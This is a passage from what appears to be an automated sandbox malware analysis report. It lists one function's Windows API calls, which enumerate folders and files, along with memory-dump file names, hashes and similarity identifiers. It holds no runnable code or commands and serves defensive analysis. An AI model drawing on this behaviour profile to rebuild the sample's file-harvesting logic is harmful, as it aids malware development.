                                        • Instruction Fuzzy Hash: 06F09A72A10710AFD720BBB89A06B4A33B07F04737F244249FC15A65D6CB745A8D9EA6
                                        Function 00A54F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A58E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A54F7A
                                        • lstrcat.KERNEL32(?,00A61070), ref: 00A54F97
                                        • lstrcat.KERNEL32(?,01609278), ref: 00A54FAB
                                        • lstrcat.KERNEL32(?,00A61074), ref: 00A54FBD
                                          • Part of subcall function 00A54910: wsprintfA.USER32 ref: 00A5492C
                                          • Part of subcall function 00A54910: FindFirstFileA.KERNEL32(?,?), ref: 00A54943
                                          • Part of subcall function 00A54910: StrCmpCA.SHLWAPI(?,00A60FDC), ref: 00A54971
                                          • Part of subcall function 00A54910: StrCmpCA.SHLWAPI(?,00A60FE0), ref: 00A54987
                                          • Part of subcall function 00A54910: FindNextFileA.KERNEL32(000000FF,?), ref: 00A54B7D
                                          • Part of subcall function 00A54910: FindClose.KERNEL32(000000FF), ref: 00A54B92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: bf839d936ea9fc35a13599dcf942a1a8a4df038367c1a87b0168cac702b6d52f
                                        • Instruction ID: ae8a4290881c30614c5a8eff6da4b14377b6a14da6fba0431924c74bbd0036ed
                                        • Opcode Fuzzy Hash: bf839d936ea9fc35a13599dcf942a1a8a4df038367c1a87b0168cac702b6d52f
                                        • Instruction Fuzzy Hash: E521AA76900208A7D754FBB0DD46FEE337CBB98301F004555B65993181EE749ACD8BA7